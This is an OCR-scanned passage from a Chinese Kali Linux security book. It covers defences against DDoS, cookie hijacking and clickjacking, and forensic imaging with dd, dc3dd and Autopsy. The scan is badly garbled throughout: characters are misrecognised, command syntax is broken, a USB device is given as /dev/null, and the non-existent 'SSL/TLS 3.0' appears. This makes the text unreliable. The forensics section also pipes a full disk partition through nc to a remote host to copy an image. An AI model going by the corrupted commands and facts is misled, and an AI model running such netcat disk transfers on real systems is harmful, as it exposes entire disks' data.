7.4 防御 拒绝 服务 攻击 


大 多 数 分 布 式 拒绝 服务 攻击 (DDoS, Distributed Denial of Service ) 或 标准 的 拒绝 服务 攻击 
(DoS, Denial of Service ) 工具 都 是 用 C# 或 者 Java 写 的 开源 工具 。 我 们 在 第 6 章 中 演示 过 个 人 如 何 
通过 DoS 工 具 来 限制 用 户 对 线 上 资源 的 访问 或 是 让 网 站 宕 机 从 而 对 它 的 业务 造成 毁灭 性 的 影 啊 。 
DDoS/DoS 工 具 通 稼 都 会 以 Web 应 用 压力 测试 工具 的 名 称 来 宣传 。 尽 管 它们 可 能 会 被 用 于 压力 测 
试 ， 但 大 多 数 情 况 下 还 是 服务 于 恶意 用 途 。 


大 多 数 情况 下 DDoS/DoS 攻 击 要 求 搞 震 网 络 基 础 设施 硬件 。 防 御 DDoS/DoS 攻 击 的 篆 见 做 法 
之 一 是 对 要 处 理 大 量 涌 和 的 数据 包 的 网 络 便 件 进行 配置 ， 使 其 能 检测 到 反 向 的 行为 和 流量 模式 
( Traffic Pattern )。 检 测 到 的 恶意 流量 应 该 被 目 动 过 滤 ， 从 而 避 倪 服务 被 中 断 。 人 第 三 方 服务 提供 商 
所 提供 的 工具 ， 如 负载 均衡 器 和 Web 应 用 防火 墙 (WAE，Web Application Firewall )， 在 侦 测 和 防 
御 试 探 容 积 和 应 用 类 型 的 攻击 上 效 采 非常 显著 。 市 有 DoS 侦 测 功能 的 安全 工具 也 能 识别 网 络 、 会 
话 和 应 用 层 的 流量 ， 引 入 它 就 是 为 了 降低 可 能 存在 于 协议 栈 各 层 的 DoS 风 险 。 


为 了 防御 持续 的 、 长 时 间 的 攻击 ， 许 多 企业 都 转向 DDoS 应 用 服务 提供 商 寻 求 帮 助 。DDoS 
应 用 服务 提供 商 能 够 跟 你 的 ISP 一 起 协作 , 竹 试 通过 将 流 回 你 们 网 络 的 DDoS 流量 从 企业 的 服务 大 
重 定 向 到 其 他 地 方 来 组 织 DDoS 攻 击 。 他 们 是 信 助 路 由 协议 来 实现 这 种 防御 的 ， 比 如 边界 网 关 协 
iX (BGP, Border Gateway Protocol ) 和 高 级 DNS 技术 。 


许多 DDoS/DoS 攻 击 在 实施 时 用 的 都 是 伪造 的 或 无 效 的 卫 地 址 。 网 络 管理 员 应 该 在 他 们 连接 
到 互联 网 的 边界 路 由 右上 部 团 单 播 逆 向 路 径 转 发 (Unicast RPF, Unicast Reverse Path Forwarding ) 
来 作为 针对 发 起 DDoS 时 伪造 IP 源 地 址 的 保护 机 制 。 大 家 普 裔 认为 单 播 逆 回 转发 是 连接 到 互联 网 
的 边界 路 由 需 实 施 防 护 的 最 佳 方式 ， 可 以 作为 防御 DDoS/DoS 的 一 个 很 好 的 起 点 。 在 思科 路 由 禹 
E, 单 注 逆 癌 转发 是 在 网 口 层 进行 配置 的 。 其 他 企业 路 由 希 生产 商 也 在 他 们 的 路 由 硕 上 提供 了 类 
似 的 功能 。 在 配置 好 单 播 逆 回 转发 后 ,来自 非 证 实 的 卫 地 址 或 是 无 效 耻 地 址 的 数据 包 会 被 丢 抒 。 


另外 一 项 识别 DDoS/DoSgS 流 量 的 最 新 技术 是 利用 Netflow 绪 合 传送 访问 控制 列表 来 阻止 流量 
进入 网 络 ,还 能 识别 内 网 攻击 。 它 会 分 析 流 量 行为 , 在 网 络 上 观察 到 的 任何 恶意 流量 征兆 都 会 触 
发 警报 ， 比 如 Smurf 或 泪 滴 攻击 数据 包 。 领 先 的 DDoS/DoS 解 决 方案 都 具备 监测 内 部 和 外 部 
DDoS/DoS 威 胁 的 能 
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7.5 防御 针对 cookie 的 攻击 


我 们 在 前 面 章 节 中 介绍 过 ，cookie 劫 持 是 攻击 者 盘 取 会 话 cookie 的 一 种 技术 。 如 果 你 的 网 站 
运行 的 是 SSL/TLS 3.0，cookie 劫 持 就 基本 失效 了 。 许 多 攻击 者 都 组 合 使 用 中 间 人 攻击 或 SSL strip 
攻击 来 绕 过 SSL/TLS; 不 过 ,确保 你 的 Web 应 用 只 有 安全 的 页 面 ,也 就 意味 着 不 提供 HTTP 到 HTTPS 
的 重 定 回 ， 这 样 能 够 降低 这 类 攻击 的 有 效 性 。 


能 工作 在 SSL/TLS 连 接 上 很 好 的 。 开 发 者 可 以 在 cookie 上 设置 Secure 和 HttpOnly 


M 如 果 攻 击 者 使 用 跨 站 脚本 来 向 他 们 的 服务 器 发 送 cookie， 那 么 cookie 动 持 就 
Q 标记 降低 这 种 风险 。 


针对 Web 应 用 安全 一 个 常见 错误 是 假定 开发 者 对 整个 会 话 都 做 了 安全 加 固 , 而 实际 上 他 们 只 
是 对 该 Web 应 用 的 身份 认证 页 面 做 了 安全 加 固 。 如 果 不 是 对 整个 会 话 都 进行 了 安全 加 固 的 话 ， 用 
户 很 有 可 能 会 被 攻击 。 开 发 者 必须 保证 他 们 的 整个 应 用 都 支持 基于 SSL/TLS 3.0 的 安全 的 和 经 过 
加 密 的 Web 会 话 ， 从 而 避免 被 攻击 。 


其 他 针对 cookie 动 持 的 防御 还 可 以 跟 流行 的 应 用 分 发 控制 带 实 例 一 起 工作 ， 如 人 负载 均衡 器 和 
内 容 过 滤 融 。 稍 见 的 可 以 考虑 的 第 三 方 服 务 提 供 商 有 思科 、Bluecoat、Riverbed 、Websense 及 其 
他 一 些 广 商 。 这 些 服务 提供 商 中 有 很 多 都 会 将 cookie 标 记 修 改 为 Secure 和 HttpOnly。 他 们 还 提供 内 
建 的 私有 技术 来 降低 一 些 跨 站 脚本 攻击 的 危害 。 


7.6 PHATA 


我 们 在 第 5$ 齐 中 介绍 过 点 击 劫持 ， 它 是 一 种 攻击 方法 : 攻击 者 欺骗 用 户 ， 使 其 在 点 击 一 些 页 
面 元 每 时 实际 上 是 在 点 击 其 他 一 些 东 西 ,， 而 非 他 们 认为 它 所 呈现 的 内 容 。 对抗 点 击 支持 的 最 好 方 
法 之 一 是 运行 Firefox 或 Chrome 浏 哆 兹 的 noscript 扩 展 。 它 会 阻止 未 经 认证 的 代码 在 Web 浏 响 右 中 
运行 。Noscript 可 以 检测 到 未 经 认证 的 脚本 、 和 警示 用 户 该 脚本 的 存在 并 阻止 脚本 运行 。 用 户 也 可 
以 选择 全 局 关闭 某 个 会 话 或 某 个 网 站 中 的 脚本 控制 。 

本 书 作 者 非常 中 意 noscript; 不 过 ， 你 应 该 到 励 Web 开 发 者 在 HITP 啊 应 中 设置 X-Frame- 
Options 首 部 来 降低 Web 应 用 中 的 这 类 风险 。 此 外 ,有些 应 用 分 发 控制 器 (ADC ) 实例 也 为 管理 员 
提供 了 编写 定制 脚本 的 功能 。 它 也 有 助 于 降低 这 类 风险 。 


| Q 有 些 网 站 可 能 必须 要 能 运行 脚本 。 这 类 情况 包括 购物 车 或 是 其 他 电 商 网 站 。 | 
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7.7 ”数字 取证 


Kali Linux 1.0 包 含 了 一 些 用 于 满足 取证 需求 的 工具 。 取 证 是 调查 证 据 并 完善 跟 事 件 有 关 的 事 
实 的 过 程 。 本 节 将 会 针对 数字 取证 做 一 些 介绍 。 我 们 认为 当 你 的 一 些 资产 ， 例 如 服务 器 或 Web 应 
用 ， 受 到 和 危害 时 ， 你 有 必要 制定 一 个 应 对 计划 。 你 最 好 调研 一 下 其 他 资源 ， 接 受 更 完善 的 培训 。 
取证 本 号 的 内 容 已 经 超出 了 Kali Linux 中 目 诗 的 这 些 取证 工具 。 数 字 取 证 是 信息 安全 领域 中 发 展 
迅 狐 的 一 个 领域 ， 很 少 有 人 真正 在 行 。 


在 你 进行 数字 取证 时 , 一 定 要 记 住 三 条 规则 。 如 果 没 能 很 好 地 遵守 这 三 条 规则 ,那么 , 你 基 
于 目 己 的 调研 所 得 出 的 结论 ， 看 起 来 可 能 会 很 业余 ， 或 者 你 的 取证 调查 看 上 去 用 处 不 大 。 


第 一 条 规则 是 不 要 直接 对 原始 数据 进行 操作 。 一 定 要 用 副本 来 进行 取证 。 确保 在 创建 副本 时 
你 并 没有 修改 数据 。 一 旦 动 了 或 修改 了 原始 数据 ,你 的 调查 结 琳 束 坚 无 意义 了 。 算 改 过 的 证 据 不 
能 用 于 任何 法 律 激 讼 ,不管 你 从 中 找到 了 什么 。 原 因 是 一 旦 原始 数据 被 修改 了 ， 就 存在 找 出 的 是 
伪证 进而 让 兰 事实 芮 相 的 可 能 性 。 举 个 修改 原始 数据 的 例子 , 调整 系统 日 志 中 的 时 间 截 就 可 能 改 
变 事 实 真相 。 而 我 们 无 法 甄别 这 是 业余 分 析 师 的 失误 还 黑客 尝试 掩盖 痕迹 而 做 的 这 类 修改 。 


许多 取证 专家 都 会 用 专用 设备 来 一 个 比特 一 个 比特 地 复制 数据 。 有 一 些 声 党 很 好 的 软件 也 可 
以 达到 同样 的 效果 。 详 细 记 录 整 个 过 程 也 很 重要 。 法 律 诉讼 中 出 示 的 许多 数字 副本 最 终 帮 被 打 回 
T, 原因 是 存储 退 介 如 硬盘 的 散 列 跟 复 制 出 来 的 数据 的 散 列 不 一 致 。 便 盘 的 散 列 肯定 无 法 跟 受 污 
染 的 副本 的 散 列 一 致 ,即使 只 是 修改 了 其 中 一 个 比特 位 的 信息 。 散 列 一 致意 味 痢 基本 上 可 以 确定 
原始 数据 , 包括 文件 系统 访问 日 志 、 删 除 的 数据 磁盘 信息 及 元 数据 , 就 是 原 娘 数据 源 的 精确 副本 。 


数字 取证 的 第 二 条 规则 是 能 存储 数据 的 一 切 巡 介 都 要 检查 。 在 涉及 数字 媒介 的 知名 案件 中 ， 
重要 证 据 部 存储 在 相机 、 数 子 摄像 机 、 视 频 游戏 控制 台 、 手 机 、iPod 和 其 他 一 些 数 字 设 备 中 。 如 
末 一 个 设备 审 有 存储 用 户 数据 的 功能 , 那么 该 设备 在 取证 调查 中 就 有 可 能 用 到 。 不 要 只 是 因为 可 
能 性 不 大 就 错过 一 些 设备 。 汽 车 导航 系统 会 将 地 图 和 音乐 存储 到 SD 卡 中 ， 不 法 分 子 可 能 会 用 它 
隐 茂 数据。 另外， 还 可 以 基于 下 载 音 乐 的 标记 提供 互联 网 使 用 的 证 据 。 


数字 取证 的 最 后 一 个 重要 规则 是 确保 你 记录 下 来 了 所 有 发 现 . 达 成 绪论 的 所 有 证 据 和 步骤 郡 
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必须 易于 理解 ， 这 样 才能 受信 。 更 重要 的 是 ,你 的 发 现 必须 是 可 重 现 的 。 独 立 调查 员 根 据 你 的 文 
档 和 撤 术 必须 能 得 出 跟 你 一 样 的 绪论 。 还 有 很 重要 的 一 点 是 你 的 文档 必须 能 够 剑 持 一 个 记录 了 什 
么 时 候 发 生 了 什么 、 怎 么 发 生 的 事件 时 间 线 。 所 有 的 时 间 线 结论 都 应 该 被 记录 下 来 。 


取证 调查 实质 上 就 是 检验 安全 专家 对 跟 事 件 关 联 的 证 据 的 洞察 力 。 人 们 很 容易 基于 个 人 观点 
推断 发 后 了 什么 以 及 谁 是 坏人 。 这 么 做 很 快 就 会 让 你 在 圈子 里 名 声 拜 尽 。 作 为 取证 专家 ， 你 必须 
只 陈述 事实 。 看 看 下 面 这 两 个 描述 有 什么 差异 : (1) Alice 窃 取 了 Bob 的 文件 ; (2) 登录 的 用 户 名 为 
Alice 的 账户 发 起 了 一 个 从 用 户 账户 Bob 的 主 目录 ,到 序列 号 为 XXX 的 USB 人 硬盘 的 复制 操作 , 日 期 
为 XXX， 时 间 惟 为 XXX。 真 正 的 坏人 可 能 窃取 了 Alice 的 登录 凭据 (使 用 本 书 中 介绍 的 方法 ), 并 
窃取 了 Bob 的 数据 ， 而 表现 为 是 Alice 在 操作 。 你 得 出 结论 的 那 一 刻 ， 你 的 案例 因为 个 人 干扰 立即 
变 得 没有 说 服 力 了 。 记 住 ,作为 取证 的 专业 人 士 , 你 可 能 会 被 要 求 宣誓 给 出 有 关 发 生 了 什么 的 证 
词 。 当 有 任何 事实 以 外 的 内 容 被 记录 了 下 来 时 ， 人 们 都 可 能 会 质疑 你 的 可 信和 性 。 


7.7.1 Kali 取 证 启动 模式 


Kali Linux 有 个 选项 是 使 用 取证 启动 模式 ( Forensics Boot )。 如 果 你 是 使 用 Kali 启 动 盘 ( 如 Live 
CD) 来 启动 系统 ， 你 可 以 选择 Kali 取 证 模式 。 如 果 你 要 将 Kali 作 为 一 个 取证 工具 集 ， 我 们 强烈 建 
议 你 将 Kali Live CD 作为 你 的 工具 集中 的 一 部 分 。KaliLive CD 可 以 从 KaliLinux 网 站 上 以 ISO 映 像 
文件 的 形式 下 载 ( 参见 1.5 市 )。 在 Kali 启 动 后 ， 你 能 看 到 Forensics mode 会 是 一 个 可 选择 的 选项 。 


KN 


Boot meni 


Graphical] install 
Text-mode install 


Prwxx ENTER to boot or TAR to edil a mem entry 


以 取证 模式 (Foronsil mode ) 使 用 Kali Linux 可 以 帮助 你 达成 第 一 条 黄金 规则 : 不 修改 原始 
文件 系统 。 它 不 会 使 用 内 部 硬盘 ， 也 不 会 目 动 挂 载 内 部 人 硬盘。 交换 (SWAP) 分 区 和 所 有 其 他 担 
当 内 存 或 缓存 的 分 区 也 都 不 会 以 任何 形式 使 用 。 
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在 取证 模式 中 ， 可 移动 媒介 不 会 日 动 挂 载 。 如 有 果 有 CD 或 U 盘 插入 到 了 系统 上 ， 它 什么 也 不 
会 做 。 很 有 可 能 你 会 通过 手动 挂 载 的 方式 在 取证 模式 中 使 用 可 移动 媒介 。 这 便于 取证 专家 对 系统 
上 已 挂 载 的 文件 系统 和 媒介 进行 完全 控制 。 

如 前 面 所 述 , 你 一 定 要 使 用 数据 源 的 副本 来 开展 工作 。 在 做 取证 工作 时 , 保证 副本 的 文件 系 


统 完好 无 损 很 重要 , 这 样 你 束 能 说 明 目 己 并 没有 做 任何 修改 , 并 且 你 提供 的 步 又 也 可 以 被 重复 执 
行 。 让 我 们 看 看 如 何 使 用 Kali 中 市 有 的 工具 来 对 数据 进行 复制 和 散 列 计算 。 


使 用 Kali 进 行文 件 系统 分 析 


dd 是 Linux/Unix 系 统 中 最 常见 的 文件 系统 复制 工具 之 一 。 该 工具 可 以 用 来 生成 文件 系统 的 一 
份 完全 复制 , 包括 已 删除 的 硼 区 和 启动 局 区 。 在 许多 情况 中 , 该 工具 用 于 创建 外 部 媒介 或 是 硬盘 
的 映像 文件 。 在 aa 创建 好 磁盘 映像 文件 后 ， 该 文件 可 以 在 其 他 系统 上 挂 载 或 检查 。 如 有 必要 ， 
dd 可 以 将 磁盘 映像 文件 保存 到 网 络 共享 上 或 是 USB 硬 盘 中 , 这样 取 证 分 析 就 不 会 使 用 本 地 文件 系 
统 。 下 一 个 例子 会 演示 如 何 使 用 dd 来 生成 内 部 人 硬盘 的 一 份 副 本 。 第 一 步 是 选择 日 标 机 絮 ， 并 使 用 
Kali Live CD 启动 取证 模式 。 


我 们 将 会 运行 sfgisk -1 命令 来 查看 我 们 要 进行 分 析 的 系统 上 的 磁盘 信息 。 


:~# sfdisk -l 


Disk /dev/sda: 3916 cylinders, 255 heads, 63 sectors/track 

Warning: extended partition does not start at a cylinder boundary. 

DOS and Linux will interpret the contents differently. 

Units = cylinders of 8225280 bytes, blocks of 1024 bytes, counting from 0 


Device Boot Start End #cyls #blocks Id System 


/dev/sdal 3751- 3752- 30130176 83 Linux 

/dev/sda2 3916- 165- 1324033 5 Extended 

/dev/sda3 - 0 0 QO Empty 

/dev/sda4 - O 0 O Empty 

/dev/sda5 3751+ 3916- 165- 1324032 82 Linux swap / Solaris 


~# g 


前 面 的 截图 显示 了 五 个 分 区 。 分 区 1、2、5 看 起 来 比较 有 用 ， 而 分 区 3 和 分 区 4 显示 为 空 。 记 
住 ， 交 换 分 区 可 能 会 包含 用 户 活 动 和 绥 存 遗留 下 来 的 一 些 信息 。 如 果 用 Live CD 来 局 动 一 个 基于 
Windows 的 系统 ， 我 们 可 能 会 看 到 一 个 不 同 的 分 区 结构 ， 不 过 ， 整 体 概念 基本 一 致 。 


下 一 步 是 决定 要 复制 哪个 分 区 。 我 们 选择 前 面 的 映像 文件 中 第 一 个 分 区 列 出 的 /dev/sdal。 
dd 命令 的 基本 使 用 方法 如 下 : 


dd if=< 媒 介 / 媒 介 上 的 分 区 > of=< 映 像 文 件 > 
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在 本 例 中 ， 我 们 将 会 输入 以 下 命令 来 创建 第 一 个 分 区 的 副本 : 
dd if-/dev/sdal of=sdal-image.dd 


它 会 创建 一 个 映像 文件 ， 作 为 跟 我 们 本 地 文件 系统 上 sdal 分 区 的 一 个 完全 副本 。 和 希望 你 能 
看 出 我 们 操作 中 的 一 个 重要 问题 。 我 们 刚刚 违背 了 黄金 法 则 之 一 ， 那 就 是 不 要 修改 原始 数据 ; 而 
我 们 将 该 文件 写 到 了 本 地 文件 系统 中 , 这 样 会 被 认为 修改 了 原始 数据 。 最 佳 方式 是 将 该 映像 文件 
写 到 男 外 一 个 文件 系统 中 ， 比 如 一 个 不 同 的 分 区 、 网 络 共享 或 是 USB 便 盘 中 。 本 人 的 个 人 偏好 是 
使 用 USB 人 硬盘， 不 过 ， 在 这 个 例子 中 ,使 用 本 地 文件 系统 仅仅 是 为 了 演示 ， 因 此 也 可 以 接受 。 


要 使 用 USB 便 盘 作为 被 复制 的 系统 的 存储 设备 ， 你 需要 先 将 一 个 大 的 USB 便 盘 择 到 系统 上 。 
为 在 Live CD 的 取证 模式 中 ,Kali 不 会 目 动 挂 载 该 USB 便 盘 。 通 沼 , 你 要 保持 该 文件 系统 不 被 挂 
载 ， 然 后 用 dd 工具 来 处 理 该 便 盘 的 详细 内 容 。 要 这 么 做 ， 你 需要 运行 下 面 截图 中 显示 的 命令 : 


:~# dd if=/dev/sdal of=devynuLLysdal-image .dd 国 


该 USB 设 备 的 位 置 是 /dev/null， 不 过 ,你 可 以 选择 任意 位 置 。 你 也 可 以 将 该 映像 文件 耻 
接 保存 到 NFS 网 络 共享 中 。 你 可 以 用 以 下 命令 来 完成 : 

dd if=/dev/sdal | nc 我 的 主机 IP 地 址 TAs, > 

在 下 面 的 例子 中 ， 我 们 会 把 分 区 sqa1 克 隆 到 卫 地 址 为 10.0.0.$ 的 NFS 存 储 服 务 硕 上 

dd if=/dev/sdal | nc 10.0.0.5 

还 有 其 他 一 些 工 具 可 用 来 克隆 文件 系统 。 我 们 建议 使 用 aa 工具 来 克隆 特定 分 区 ， 因 为 它 在 
Kali 以 及 许多 其 他 Linux 和 Unix 系 统 中 都 是 日 带 的 。 克 隆 系 统 的 过 程 可 能 会 非常 耗 时 , 这 取决 于 你 
要 复制 的 分 区 有 和 多大。 尽管 gd 是 一 个 非常 好 的 工具 , 但 它 并 非 所 有 情况 下 都 是 最 佳 工 具 。 如 果 你 
是 要 克隆 整个 磁盘 , 这 里 还 有 其 他 一 些 流行 的 工具 , 比如 AIMAGE 或 AIR Imager, 它们 都 不 是 Kali 
中 预 装 的 , 但 非常 受 欢 迎 。 重 要 的 是 如 果 该 调查 结果 有 可 能 会 用 在 法 律 诉讼 中 , 一定 要 确保 取证 
调查 中 用 的 工具 符合 证 据 收集 相关 规定 。 


1.1.2 dc3dd 


ac3aa 是 增加 了 取证 功能 的 aa 工具 。dc3dd 可 以 一 比特 一 比特 地 计算 你 正 复制 的 硬盘 和 源 硬 
盘 之 间 的 散 列 。 这 对 证 明 你 正在 研究 的 数据 副本 跟 原 始 数据 完全 一 致 至 关 重 要 。 你 可 以 通过 创建 
一 份 原始 数据 和 副本 的 散 列 来 供 后 面 验证 是 否 一 致 。 


在 下 个 例子 中 ， 我 们 会 运行 sfdisk -1 命令 来 查看 现 有 的 便 盘 和 分 区 。 如 下 面 的 截图 所 示 : 
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:~# sfdisk -l 


Disk /dev/sda: 3916 cylinders, 255 heads, 63 sectors/track 

Warming: extended partition does not start at a cylinder boundary. 

DOS and Linux will interpret the contents differently. 

Units = cylinders of 8225280 bytes, blocks of 1024 bytes, counting from 0 


Device Boot Start End #cyls #blocks Id System 


/dev/sdal : 4 3752 30130176 83 Linux 

/ dev /sda2 3751+ 916 - 165 - 1324033 5 Extended 

/dev/sda3 0 - 0 0 Empty 

/dev/sda4 0 = 0 0 Empty 

/dev/sda5 3751+ 3916- 165 - 1324032 Linux swap / Solaris 


:~# | 


qdc3dq 工 具 运 行 的 方式 跟 aq 工 具 很 像 。 你 可 以 选 定 一 个 源 硬 盘 或 一 个 源 分 区 以 及 要 存储 该 映 
像 文件 的 目标 位 置 。 它 还 提供 了 一 个 散 列 选项 。 在 下 个 例子 中 ,我 们 会 选择 分 区 /dev/sda2, 并 
将 它 复 制 到 一 个 名 为 CopyofDrivedqc3dq 的 映像 文件 中 ， 同 时 用 sha256 计 算 散 列 。 


y 这 个 例子 是 为 了 演示 。 实 际 的 取证 调查 中 ， 我 们 不 会 将 映像 文件 保存 到 同 
Q aar. 


:-4 dc3dd if=/dev/sda2 of=/root/CopyofDrivedc3dd version hash=sha256] 


dc3dd 会 在 复制 完成 后 提供 一 个 针对 被 复制 便 盘 的 输入 文件 的 唯一 散 列 人 码 。 


dc3dd 7.1.614 started at 2013-07-06 17:32:32 -0400 

compiled options: 

command line: dc3dd if=/dev/sda2 of=/root/CopyofDrivedc3dd version hash=sha256 
device size: 2 sectors (probed) 

sector size: 512 bytes (probed) 

1024 bytes (1 K) copied (100%), 0.101596 s, 9.8 K/s 


input results for device '/de 
2 sectors in 
0 bad sectors replaced by zeros 
¢286355c 09505425c 793774ca4be95e5de98a6b7a4cd0a9a24e6 F7473d490e6b (sha256) 


output results for file '/root/CopyofDrivedc3dd version’: 
2 sectors out 


dc3dd completed at 2013-07-06 17:32:32--0400 


重要 的 是 证 明 副 本 的 散 列 跟 原 始 数据 文件 的 散 列 是 一 致 的 。 我 们 可 以 使 用 命令 sha256sum 
来 计算 散 列 。 如 果 我 们 在 文件 CopyofDrivedc3dd 上 计算 了 散 列 , 也 在 分 区 /dewsda2 上 计算 了 散 列 ， 
我 们 能 看 到 他 们 是 一 致 的 。 我 们 甚至 能 看 到 dac3dq 副 本 的 输出 也 是 一 样 的 。 既 然 散 列 都 一 致 ， 我 
们 可 以 确信 取证 调查 中 用 到 的 文件 是 完全 一 样 的 。 


7.7 数字 取证 225 


dc3dd 7.1.614 started at 2013-07-06 17:32:32 -0400 

compiled options: 

command Line: dc3dd if=/dev/sda2 of-/root/CopyofDrivedc3dd version hash=sha256 
device size: 2 sectors (probed) 

sector size: 512 bytes (probed) 

1024 bytes (1 K) copied (100%), 0.101596 s, 9.8 K/s 


input results for device '/dev/sda2': 
2 sectors in 
O bad sectors replaced by zeros 
c286355c09505425c 7937/74ca4be95e5de98a6b/a4cd0a9a24e6f7473d490e6b (sha256) 


output results for file '/root/CopyofDrivedc3dd version': 
2 sectors out 


dc3dd completed at 2013-07-06 17:32:32 -0400 


:~# sha256sum CopyofDrivedc3dd version 
¢286355c 09505425c 793774ca4be95e5de98a6b 7a4cd0a9a24e6F74730c490e6b CopyofDrivedc3 
dd version 

:~# sha256sum /dev/sda2 
c286355c09505425c793774ca4be95e5de98a6b7a4cd0a9a24e6f74734490e6b /dev/sda2 


7.7.3 Kali 中 的 其 他 取 十 工具 


Kali 在 标 为 Forensics 的 目录 下 有 无 数 的 取证 工具 。 这 里 有 一 些 Kali 中 和 党 用 的 工具 ， 主 要 用 于 
Web 应 用 取证 。 


1. chkrootkit 


chkrootkit 可 以 在 Linux 系 统 中 运行 基于 签名 和 进程 来 检查 系统 中 是 否 存 在 rootkit。 你 可 以 
将 它 当 成 针对 Linux 系 统 的 反 病 毒 软件 或 反 恶 意 软件 。 

要 运行 cnkrootkit 工 具 ， 打 开 一 个 命令 行 终端 窗口 ， 输 入 chkrootkit。 它 会 检查 本 地 操 
作 系 统 中 是 否 有 已 安装 的 rootkit。 


:~# chkrootkit Jj 


chkrootkit 是 一 个 保证 你 的 Kali 副 本 没有 被 影响 的 简单 工具 。 你 也 可 以 在 其 他 Linux 发 行 版 
于 安装 并 运行 chkrootkit 工 具 。 


2. Autopsy 


Autopsy 是 一 个 开源 的 数字 取证 工具 , 可 以 运行 在 Windows、Linux、OS X 及 其 他 Unix 系 统 上 。 
Autopsy 可 以 用 于 分 析 磁 组 映像 文件 并 对 文件 系统 进行 深入 分 析 ， 如 NTFS、FAT、HFS+、Ext3、 
UFS 以 及 一 些 其 他 卷 系统 类 型 。Autopsy 最 各 见 的 用 法 是 作为 管理 映像 文件 分 析 的 案例 管理 工具 。 
还 记得 我 们 是 如 何 使 用 aa 工具 来 创建 映像 文件 的 么 ?” Autopsy 可 以 帮助 我 们 研究 该 映像 文件 。 


要 运行 Autopsy， 你 可 以 浏览 到 Kali Linux > Forensics > Digital Forensics， 并 选择 Autopsy。 
它 会 调 起 一 个 终端 窗口 ， 并 运行 该 应 用 。 你 可 以 让 那个 窗口 开 看 ， 在 Web 界 面 上 使 用 该 工具 。 要 
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Vila] Web AM, FTF Webi Ui 2s, FFF mh]http://localhost:9000/autopsy.; 


rowser currently has Java Script enabled. 


You do not need Java Script to use Autopsy and it is recommended that it be turned off for security reasons. 


Autopsy Forensic Browser 2.24 


OPEN CASE New CASE 


选择 New Case 创 建 一 个 新 的 案例 。 它 会 跳 到 下 面 的 示例 截图 : 


CREATE A NEW CASE 


1. Case Name: The name of this investigation. It can contain only 
letters, numbers, and symbols. 


CaseO1 


e Description: An optional, one line description of this case. 
DrChaos Test Case 


3. Investigator Names: The optional names (with nc spaces) of the 
investigators for this case. 


a. |Aamir Lakhani b. [Joey Muniz 


Autopsy 会 在 继续 进行 之 前 弹出 一 些 问题 。 问 题 包 括 设 置 时 区 、 输 入 你 的 Kali 系 统 和 要 调查 
的 系统 之 间 的 时 间 偏 移 ， 以 及 描述 ， 如 主机 名 等 。 


在 下 面 的 这 个 例子 中 ,我 们 会 用 Autopsy 来 检查 前 面 例子 中 通过 aq 工具 创建 的 一 个 映像 文件 ， 
如 下 面 的 截图 所 示 : 


:~# dd if-/dev/sda5 of=mytestimage.dd 
“64806440 records in 
puram ‘lathe out 


(1.4 GB) copied, [11.6758 s, |122 MB/s 


a is 
Desktop fimap.log LOIC loic.sh mytestimage.dd tftproot 
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第 一 步 是 向 Autopsy 加 载 映像 文件 ， 如 mytestimage.dd。 


1. Location 

Enter the full path (starting with to the image file. 

If the image is split (either raw or EnCase), then enter '*' for the 
extension. 


/root/mytestimage.dd 


2. Type 


Please select if this image file is for a disk or a single partition. 
Disk * Partition 


3. Import Method 

To analyze the image file, it must be located in the evidence locker. It 
can be imported from its current location using a symbolic link, by 
copying it, or by moving it. Note that if a system failure occurs during 
the move, then the image could become corrupt. 


Symlink * Copy Move 


它 会 给 出 一 个 选项 让 你 设置 使 用 aq 工具 创建 文件 时 生成 的 该 文件 的 散 列 值 。 你 可 以 让 
Autopsy 计 算 散 列 值 。 本 书 作者 建议 你 自行 计算 MD5S 校 验 码 。 可 以 在 文件 运行 na5sum 命 令 时 生成 。 


md5sum: mytes: No such file or directory 


mytestimage .dd 
:~# 国 


你 可 以 将 计算 出 的 散 列 值 百 接 填 人 Autopsy。 


FaLANALYSIS — KEYWORD SEARCH FILE TYPE IMAGE DETAILS META DATA DATA Unt 
A 
Directory Scck Current Directory: / 
Exterthe name of a directory ADD NOTE 


that you vuntte view 
f 


GENERATE 405 List or FILES 


VIEW 


File Name Search 


Enter a Perl regular ex pression 
for the file names vou want to 
Zn 


SEARCH 


ALL DELETED Fires 


EXPAND DIRECTORIES 


了 CDIFIED 


2001 03.15 
[9:45:05 (CST) 
2001 03.15 
[0:36:48 (CST | 
2001 03.15 
19:45:05 (CST) 
2001 03.15 
19:45:05 (CST) 
2001 03.15 
19-4541? (CST! 


ACCESSED 
2001 03 15 
[9:45:05 (CST 
2001 035.15 
19-44-50 1CST) 
2001 03.16 
04:03:12 (CST) 
2001 03.15 
04203:12 (CST) 
2001 03.16 
PHOIT (CST! 


[9:45:05 (C: 
2001.03.15 
19245205 (CST) 
2001 (13.13 
19:351 56 (CST) 
2001.03.13 
19:35:02 (CST) 


File Browsing Mode 


In this mode, you can select a file or directory. 
File contents will be shown in this window. 


More file details can be found using the Metadata link at the end of the list (on the right). 


You can ako sort the files using the cokomn headers 
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Autopsy 是 一 个 可 以 帮助 收集 用 于 文档 目的 的 取证 信息 的 工具 。 当 某 个 分 区 可 以 进行 检查 时 ， 
你 可 以 用 Autopsy 来 查看 特定 人 磁盘、 文件 信息 、 原 始 文 件 以 及 它们 的 元 数据 。Autopsy 也 可 以 连接 
天 家 标准 和 技术 研究 所 的 国家 软件 参考 库 (National Institute of Standards Software Reference 
Library )， 通 过 比较 已 知 文件 的 散 列 来 判定 它们 是 正常 的 程序 还 是 非 正常 程序 。 


3. Binwalk 


在 取证 调查 中 , 我 们 通常 很 难看 出 找到 的 二 进 制 文 件 的 用 途 。 原因 是 我 们 通常 拿 不 到 二 进 制 
文件 对 应 的 源码 文件 。Binwalk 古 一 个 固件 分 析 工 具 ， 用 来 辅助 对 固件 映像 文件 和 其 他 二 进 制 软 
件 进行 分 析 、 提 取 和 逆向 工程 。Binwalk 的 关注 点 是 固件 二 进 制 文件 ; 不 过 ， 我 们 也 看 到 了 一 些 
更 新 可 用 于 家 庭 网 络 和 无 线 设 备 及 其 他 消费 电子 产品 。 

Binwalk 有 一 些 不 同 的 选项 ， 你 可 以 参考 https://code.google.conmVp/binwalk/wiki/Usage。 你 可 
以 将 命令 binwalk 和 你 要 检查 的 二 进 制 文件 的 文件 名 一 起 运行 。 下 个 例子 中 我 们 会 针对 家 庭 无 线 
路 由 希 的 二 进 制 固 件 使 用 Binwalk， 如 下 图 所 示 : 


-~/Desktop# Ls 
FW WRT54Gv8.2 8.2.68.6001 US 20091605 bin loic 
B.2 


:~/Desktop# binwalk FW WRT54Gv8.2 8.2.08.001 US 20091005. bing 


